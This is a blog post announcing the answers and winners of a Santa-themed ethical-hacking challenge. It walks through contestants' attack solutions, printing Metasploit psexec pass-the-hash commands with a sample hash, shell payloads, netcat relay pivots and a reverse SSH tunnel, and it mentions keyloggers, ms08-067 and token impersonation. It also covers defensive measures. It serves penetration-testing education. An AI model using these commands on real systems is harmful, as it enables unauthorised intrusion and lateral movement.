Santa Claus is Hacking to Town – Answers and Winners

| January 20, 2009

busted.jpgHello, challenge fans! This is Ed Skoudis, your genial challenge host, here to announce the answers and winners for our Santa Claus is Hacking to Town extravaganza.

As I’ve mentioned in the past, I try to make each of these challenges unique in some way, pushing the envelope a little bit with our challenge format, twiddling with the structure, theme, technical focus, and so forth, just to mix it up. This challenge was no exception. Pretty much every challenge we’ve done so far (28 of them in total) has focused on having readers analyze a hack and talk about what the bad guy did, devising strategies for defending against such wickedness. In this Santa challenge, we reversed roles, having you, the readers, devise an attack strategy to achieve a goal. I even made it a little more open ended than usual by creating a contrivance so you could select one additional tool to download and use in your attack. I flipped things around to make this challenge more offensive in nature, modeling the kinds of improvisation that penetration testers and ethical hackers often need to display.

So, the good news is that you guys got very creative, with different answers posing all kinds of interesting attack strategies, tactics, and tools. But, this flexibility and attack focus introduced a bit of downside for me. With so many different answers using so many different kinds of tools, it took a lot more time to judge this one to determine the winners. I had to test out each tactic you guys threw at me, just to see if it would work, in a lab designed to mimic the Burgermeister’s jail cell.

And that brings us to another aspect of this particular challenge. The quality of answers you guys submitted on this one was astoundingly good. I was seriously impressed with the technical ingenuity, creative flair, and solid writing exhibited in over ten different sets of answers. Quite honestly, this was, by far, the most difficult challenge I’ve ever had to judge because of the large number of really high-quality entries. But, I did carefully look through every single answer, and selected the best quality ones I could.

–Ed Skoudis
Co-Founder, InGuardians, SANS Fellow, EthicalHacker.net Challenge Master, Author of Counter Hack Reloaded, Santa Elf Trainee

Active Image
Active Image del.icio.us

Discuss in Forums {mos_smf_discuss:Dec 08 – Santa Claus Is Hacking to Town}

  Santa Claus is Hacking to Town

Answers & Winners 

By Ed Skoudis


Those people who find themselves on the “Honorable Mention” list should be very proud of their accomplishment, given the extremely high quality of answers received this time.  DO NOT be upset to be on that list and do not be frustrated that you didn’t take first place.  There are some seriously great answers in the Honorable Mentions list.  Think about it.  We had entries from notable security studs like Wesley McGrew, Raul Siles, Ryan Linn, Mark Baggett, Zoher Anis, Paul Tartar, and others.  Competition was fierce.  If you made the Honorable Mentions list, you are among the best of the best, some seriously smart company.  Kudos to you.

Now, let’s look at some overall answers the challenge questions, and then on to the winners.

Question 1

There were generally four categories of approaches to the challenge, all based on which tool you decided to download in the response to Question 1.

A) Download a Keystroke Logger:  Several people focused on the idea of using the Wizard’s magic power to download a keystroke logger, which they installed on the jailmasterlaptop compromised using the ms08-067 exploit, waiting for the Jail Master to logon again.  These answers tended to have the keystroke logger either write the password typed by the Jail Master into a file, which they then retrieved, or send the keystrokes across the network to Santa’s laptop.  James Philput even posited using a keystroke logger that is actually named 202c, an interesting confluence of events given the name of the 202c law in Sombertown.  More on that interesting law later.

While such an attack would certainly work, it has a significant drawback – it requires user interaction by the Jail Master.  If the Jail Master doesn’t wander into the prison again and logon to the laptop, Santa and the gang could have a long wait indeed.  In short, I liked these answers because they would certainly work, but their reliance on human interaction would cause delays not seen in approaches B and D.

B) Download a Pass-the-hash Tool: Pass-the-hash attacks are very useful in penetration testing, allowing a tester to use LANMAN and NT hashes grabbed from a compromised Windows machine to access a target Windows system or domain using only the hash via LANMAN Challenge/Response, NTLMv1, or NTLMv2 network authentication over SMB.  Because those protocols never check whether the user has the password, but instead only check whether the user’s machine has access to the password hash, an attacker can use a pass-the-hash attack without knowing or typing the password at all.  It’s an elegant approach to the problem, and a technique we use all the time in our penetration-testing regimen.

These answers tended to use the priv module of the Meterpreter, loaded into the jailmasterlaptop using the ms08-067 exploit, to retrieve the hashes.  Most answers that fell into this category relied on Hernan Ochoa’s Pass-the-Hash Toolkit (PSHTK), a very handy tool to keep around, running on the Windows XP virtual machine on Kris’ laptop.  Raul Siles relied on another variation called msvctl by Johannes Gumbel.  A gent named Cd-MaN pointed out that the iam-alt.exe program of PSHTK has a bug on some Windows XP systems, requiring an attacker to patch the program, as described here.  That’s great attention to detail, and is much appreciated.  With the hashes from the jailmasterlaptop machine loaded into the memory of Kris’ XP image on his laptop, and some funky network relays set up, these answers involved running the SysInternals psexec tool on Kris’ laptop to make dooropen.exe run on the door1 machine.

Ryan Linn even tied in some humor here, playing on the fact that the Wizard was familiar with prison life, having spent some time there based on a different variety of pass-the-hash infraction in the past, which gives Kris the idea of using a more modern and technical variety of passing the hash.  You know, innocent lamb that I am, I had never before realized that “pass-the-hash” was a drug reference until I read Ryan’s entry.  In retrospect, the name of this attack is an obvious drug reference, but you learn something new every day, I suppose.  Overall, I liked this category of answers a lot, as they get the job done and involve a good level technical sophistication, yet do not require manual intervention by the Jail Master, unlike the next category of answers.

C) Download Nothing and Instead Rely on Social Engineering or Physical Attack: In this set of answers, some folks relied on tricking the Jail Master into running dooropen.exe or otherwise revealing his password.  Of most note here was the answer by David S., which involved Jessica seducing the Jail Master and then peeing on his shoe to surprise him.  I won’t post the details, but it certainly made for interesting reading.  Others tried to social engineer me, your humble challenge master, into choosing them as winner by dazzling me with their humor.  For example, Glen wrote in this his response that he would:

Write an email to Ed Skodis [sic] and explain to him that he didn’t give us enough time to work out the exact details of this challenge. Try to make the letter as funny as possible since Ed has a sense of humor. Tell him that you were close to the generic concept, but the devil is in the details.  Tell him the joke about the 3 kids at school:

Teacher asks the kids what their fathers do.

1st Kid: My dad’s a pilot
2nd Kid: My dad’s a manager at Burger king.
3rd Kid: My dad’s a piano player in a whorehouse.

The teacher is stunned and speaks with the kid’s dad when he comes to pick
him up.

Teacher: Your kid told the class you work as a piano player in a whorehouse.
Dad: No, I’m an ethical hacker, but how do you explain that to a four-year
old!!!!!   

If you’re lucky you may win the prize for funniest answer.”

Nice try, Glen.  It was pretty funny, and is a far more elegant approach than peeing on my shoe.  Don’t get any ideas, guys.

D) Download Nothing, Relying Only on the Tools Given:  I believe this was the most elegant approach, because it involved the clever application of tools given in the challenge itself, without relying on downloading anything more.  I still give credit to those who used keyloggers (approach A) or pass-the-hash tools (approach B), because they answered correctly within the bounds of the challenge.  However, if you are clever enough to answer the challenge with no additional downloads, you got a few bonus points in the judging algorithm.  These answers tended to fall into the following two categories:

D.1) Using Metasploit’s built-in psexec exploit, which has been extended by Kurt Grutzmacher to support pass-the-hash capabilities.  This approach was used by Ron (who also put his entire answer in rhyme with a hilarious hacker rendition of ‘Twas the Night Before Christmas).  It was also used by Paul Tarter.  It’s a very solid approach, and shows off a lesser-known but very important exploit and feature in Metasploit.  The Metasploit psexec module written by HD Moore rocks, and its ability to rely on Windows hashes from Grutzmacher’s contribution is simply marvelous.  What a great approach to this problem!  I urge you to read Paul’s and Ron’s answers.  Unfortunately, Ron’s approach, while brilliant, has a bit of a problem.  He uses the psexec Metasploit exploit, with the SMBPass stolen from the Jail Master account, to run a cmd.exe on door1, using the following commands:

$ metasploit
msf > use windows/smb/psexec
msf > set RHOST localhost
msf > set RPORT 4444
msf > set PAYLOAD windows/shell/bind_tcp
msf > set SMBUser jailmaster      
msf > set SMBPass aad3b435b51404eeaad3b435b51404ee:d3ec7135d0caab12139108c13e7da38f
msf > exploit

That’s all fine and good.  It will create a shell listener for a cmd.exe on door1.  Ron took care of the plumbing for the SMB connection using the approach outlined in the answers to Question 3 below.  But, Metasploit will try to connect to that shell running on door1 to RHOST on localhost, where Ron didn’t provide a mechanism for the shell communication to be connected back to Santa in anyway.  Thus, Ron brilliantly created a dangling shell on the target box, a shell that he never connected to.  However, Ron comes right back and says, “This is assuming that the door computer has outbound access to Santa’s laptop. If it doesn’t, some of the options can be modified to directly run dooropen.exe instead of using cmd.exe first”.  In the challenge itself and on the diagram, we explicitly state that the network “firewall allows connections only between door1 and web1 machines, on any port.  All other traffic blocked.”  So, Ron’s approach is awesome, and he does describe at a high level how he’d have modified it given the blocking between those two machines.  However, Ron doesn’t provide the actual commands for that variation, which I was looking for.  My answer would have been as follows:

$ metasploit
msf > use windows/smb/psexec
msf > set RHOST localhost
msf > set RPORT 445
msf > set PAYLOAD windows/exec
msf > set SMBUser jailmaster      
msf > set SMBPass aad3b435b51404eeaad3b435b51404ee:d3ec7135d0caab12139108c13e7da38f
msf > set CMD c:\dooropen.exe
msf > exploit

Note that you have to specify two \ for the CMD so that the first one escapes the second one, or else the command won’t work.  Paul Tarter’s answer recognized this important fact, and used a variation of this technique, wrapped up with some clever network pivoting.

Now, you may ask how TCP port 445 on Santa’s localhost will get connected to port 445 of door1.  That part of the answer is included in the response to Question 2 below.

D.2) Using a shell on the jailmasterlaptop machine and some wicked network pivots to make Windows (jailmasterlaptop) authenticate to Windows (door1), having Windows pass the hash for you.  This approach, which was sent in by Wesley McGrew, involved running the SysInternals psexec tool on the jailmaster laptop, pointing through a series of netcat relays on Kris’ laptop and the web1 server, to run dooropen.exe on the door1 machine.  This was a very cool method for handling the problem, and reminded me of an idea built-into several varieties of martial arts.  Instead of using the fanciest or most complex techniques, let the opponent’s own weaknesses undermine him.  Windows has pass-through authentication as a built-in feature.  Wesley simply got shell on the jailmasterbox, and then used the runas command as follows:

runas /profile /user:jailmaster psexec \<santa’s ip> dooropen.exe

Wesley’s diagram of his approach is quite nice:

wesleysdiagram.gif 
Click for Larger Version

While his approach is very clever, Wesley’s specific syntax for the runas command failed on each system on which I tested it.  Each time I tried it, his command failed either because of the lack of quotes around “psexec \<santa’s ip> dooropen.exe” or because runas kept prompting me for jailmaster’s password.  To avoid both problems and make Wesley’s solution work, you could turn the SYSTEM-level shell provided by ms08-067 into jailmaster shell access by scheduling a backdoor with the schtasks command to run with the Jail Master’s credentials, or use a Windows token impersonation tool, such as Incognito by Luke Jennings at http://sourceforge.net/projects/incognito, to usurp a token associated with the Jail Master’s account.  Then, accessing this Jail Master shell backdoor, you could run psexec through Netcat relays to activate dooropen.exe on door1.  Wesley’s solution therefore could be extended to successfully attack the challenge, but his current syntax is a little off and missing a step.

Question 2

For this question, I was focusing on having you create some network pivoting to get around the network firewall controlling access to door1 as well as the iptables firewall on web1 and the fact that you didn’t have UID 0 on web1.  The idea here is that you need to make an SMB connection to door1, which can only be accessed by web1.  But, you cannot listen on a port less than 1024 on web1, nor can you reconfigured the firewall, both because you do not have UID 0 on it.  Instead, as shown in Wesley’s picture above, you could set up a Netcat listener-to-listener relay on Kris’ Linux laptop, where you could listen on TCP 445:

# mknod backpipe1 p
# nc –nvlp 445 0<backpipe1 | nc –nvlp 80 | tee backpipe1

This command implements a listener-to-listener Netcat relay, waiting for traffic to come in on TCP port 445 and shoving whatever data it gets to whatever is connected to TCP port 80.  But, what is connected to port 80?

Well, on web1, you could make another Netcat relay, this time a client-to-client relay, as follows:

# mknod backpipe2 p
# nc –nv door1 445 0<backpipe2 | nc –nv krislaptop 80 | tee backpipe2

Once these two relays are set up, you could then make an SMB connection to the door1 machine, using psexec functionality (either with the SysInternals psexec command running on Kris’ Windows image or on jailmasterlaptop, or using the psexec exploit of Metasploit).  For either approach, you’d set the destination of the psexec to Kris’ Linux image, where you have the first relay listening on port 445.  It’ll forward the connection to the listener on port 80, which is connected to the netcat client on web1, which is connected to the netcat client on 445 on web1, which is connected to the door1 on TCP 445.  In the end, you have an SMB client program (psexec), connected via a listener-to-listener relay to a client-to-client relay, letting you run commands on a target Windows box.  I call this approach “pivoting mercilessly”, and it’s darn useful in penetration tests.

I describe this approach, and several other techniques, as Tip #4 in my presentation called “Secrets of America’s Top Pen Testers: I Didn’t Come Up with That Title” on the InGuardians website.

But, as you might expect, there are other ways of doing this.  Some folks tried to implement a relay on web1 using two outbound connections, each created with /dev/tcp.  Unfortunately, none of the syntax folks submitted actually worked.  I’m still playing with this syntax myself to get it fine tuned.

But, there is another very useful approach to getting around our network restrictions, which was included in the answer submitted by Paul Tarter.  Instead of relying on Netcat, Paul used a reverse SSH tunnel from door1 back to Kris’ Linux image, with the following command (executed via command injection on web1):

$ ssh –R 4450:door1:445 root@krislaptop

This command sets up an ssh connection from a high-numbered port on web1 to TCP port 22 on Kris’ laptop.  This ssh connection is set up to carry a reverse tunnel, flowing in the opposite direction of the ssh connection.  Anything Kris sends to TCP port 4450 on the localhost of his laptop (such as Metasploit psexec with an RHOST of localhost and an RPORT of 4450) will be forwarded across the ssh connection.  The ssh client on web1 will then shoot anything that comes across that tunnel to door1 on TCP port 445.  In other words, Kris has used an ssh connection from web1 to his laptop to carry any data from his laptop on port 4450 through web1 to door1 on port 445, including an SMB connection from Metasploit’s psexec.  It’s a very elegant way to pivot through web1 and follows the restrictions imposed by the network firewall and the iptables local firewall on web1.  Furthermore, it provides encryption of part of the communication – the flow of data from Kris’ laptop to web1, still leaving the web1-to-door1 data unencrypted.  Great work, Paul!

Question 3

Frequent readers of our challenges know that I like to ask an open-ended question, to give you a chance to flex your muscles a bit.  For this one, I was looking for good defensive approaches.  Many people pointed out that the prison wireless access should be secured, perhaps using WPA2 with a very strong pre-shared key.  Others pointed out the importance of patching systems, such as the jailmasterlaptop.  Some suggested improving the firewall configurations to block all ports except those absolutely needed for business in the prison.  Many pointed out the need to improve the security of the web application on web1 to eliminate command injection and other likely flaws, such as SQL injection, Cross-Site Scripting, and Cross-Site Request Forgery.  All of these are good suggestions.  Some even suggested the abandonment of Windows entirely, due to the dangers of pass-the-hash attacks.  Unfortunately, that approach isn’t practical for most of us.

And, several people pointed to the need to abolish the law called 202c from Sombertown, because it had lulled them into a false sense of security.  Their protections had rotted from within because of that law.  The language of the law, which I simply crafted by making a few small tweaks to the anti-toy law from the original Santa Claus is Coming to Town TV show, simply stated: “Hacker tools are hereby declared illegal, immoral, unlawful.  And, anyone found with a hacker tool in his possession will be placed under arrest and thrown in the dungeon”.  A very few people commented on how that law looked remarkably similar to the law passed in 2007 in Germany, called, appropriately enough, 202c.  This, of course, was no accident.  I’m sure you noticed the distinctly… how shall I say this… Teutonic nature of the Burgermeisters in the original TV show?  Well, based on that, I modeled the Sombertown 202c law on Germany’s own 202c, the law of the land in that country.

So, there you have it — some detailed commentary on different ways to approach the challenge.  For more details, I urge you to read the winning entries below.

The Winners

As I mentioned above, competition was fierce.  The folks that won honorable mention deserve major kudos.  I worked very hard to narrow things down to these winners, based on the elegance of their approach and the cleverness of their answers.  I am truly honored to announce the following winners.

Best Creative Answer That Was Also Technically Correct:

Paul Tarter:  Paul’s answer was top-notch, just a tour de force of technical insight.  I chose him as the Creative winner, because he had both a very creative technical approach, plus his narrative was really fun.  In summing up his work, I’ve got 11 words for you: Metasploit psexec with pass the hash through a reverse SSH tunnel.  And, he wrapped it all up in a highly entertaining package.  His defensive solutions are also insightful and very well explained.  If you read only one answer to this challenge, please take the time to read Paul’s.  My hat’s off to you, buddy.  Very nice work!

Honorable mentions:

Ron at SkullSecurity: An awesome and elegant approach.  Plus, your rhyming poetry was just beautiful – hilarious and well done.  Check out the start of his answer, and read the whole thing if you have time:

’twas the night before Christmas and Kris was in jail
And his friends were upset because they couldn’t make bail

"202c," they said, "how could that be done?"
"I thought we were in Canada, with 342.1?"

They tried to find Sombertown on the Google map
But Javascript was required, so they couldn’t find crap

Meanwhile Santa, who was trapped in his cell,
Fires up his Mac to see what he can tell

"Now ping, now traceroute, now metasploit and Nmap!
On cain, on able, on wireshark and netcat!"

Ere it was booted, Jessica asked if it was hard
To sneak his macbook past the prison guard

"No problem!" said Kris, "I do it every day!"
"This Macbook is barely a computer anyway!"

Ryan L.: Dude, this was a very good technical answer that also tickled my fancy.  It was lots of fun to read, and displayed excellent kung fu.

David S.: Call me an old softie, but the social engineering and urination attack was certainly different, and worthy of some sort of mention here.

Kyle O.: This is really solid work, and very entertaining too.  Kyle formulated his answer as one of those family letters that some people include in their Christmas cards.  It made for a lot of fun reading, and described a technical attack that was nearly perfect.  But, you didn’t dump the data through the backpipes in your relays.

Glen: You did make me laugh, and that’s certainly worthy of an honorable mention.  Thanks for brightening my day with your jokes.

Best Technical Answer:

Mark Baggett: Mark’s answer is brief and elegant, using PSHTK and some very nice Netcat relays.  Great work! Read it HERE.

Honorable mentions:

Raul Siles: Raul’s answer was awesome, relying on the msvctl.exe pass-the-hash tool.  Raul pretty much tied Mark’s technical results.  I gave the nudge to Mark given the brevity of his answers.  I didn’t want the top two winners to both have very long answers, because I don’t want people to think that only very long answers can win.  Brevity is beautiful thing, so while both Raul and Mark’s work was awesome, Mark edges out the victory here.

Wesley McGrew: Strategically, this was an awesome answer, relying on Windows built-in pass-through authentication.

Richard Jones: Your answer involving PSHTK was really solid, and worked very well.  Nicely done!
James Philput: This was one of the very best of the keystroke logger answers.  Excellent work, as usual, James!

Peter Jackson: Some excellent Perl stuff, and a nice overall technical approach.  Thanks for your hard work and interesting answer.

Zoher Anis: A very solid PSHTK approach, my friend!  I liked your answer… it was elegant and worked flawlessly.  Very close to winning the challenge.

Jeremy Lee: This answer was very brief, yet contained a lot of technical insight.  Also, Jeremy suggested that Sombertown get even more draconian in their laws, passing an edict that would, “deem all Python users as heretics who will be burned at the stake.”  That’s some pretty harsh legislation.  Perhaps Jeremy is a Perl or Ruby guy.

Chris C.: Nice work, but unfortunately, your listener on web1 wouldn’t be able to be reached through the firewall on that machine.

Cd-MaN: Stellar approach, man!

Random Draw Winner:

Peter Jackson!  Your answer was fantastic, sir, and the fates are on your side today.  Random number courtesy of www.peterjacksonrandomnumbers.org… just kidding… the random number was from random.org, your one stop-shop for randomness.

And, that’s it for this challenge!  Thanks again to all who participated.


Our next challenge, to be released in early February, will be The Brady Bunch Boondoggle, by Joshua Wright.  He’s one of the best wireless security researchers in the world (and, yes, I’m admittedly biased).  He’s working up some wild and weird wireless wonder to tickle our fancy, and I’m very excited to see his handiwork next month.

Category: Skillz

Comments are closed.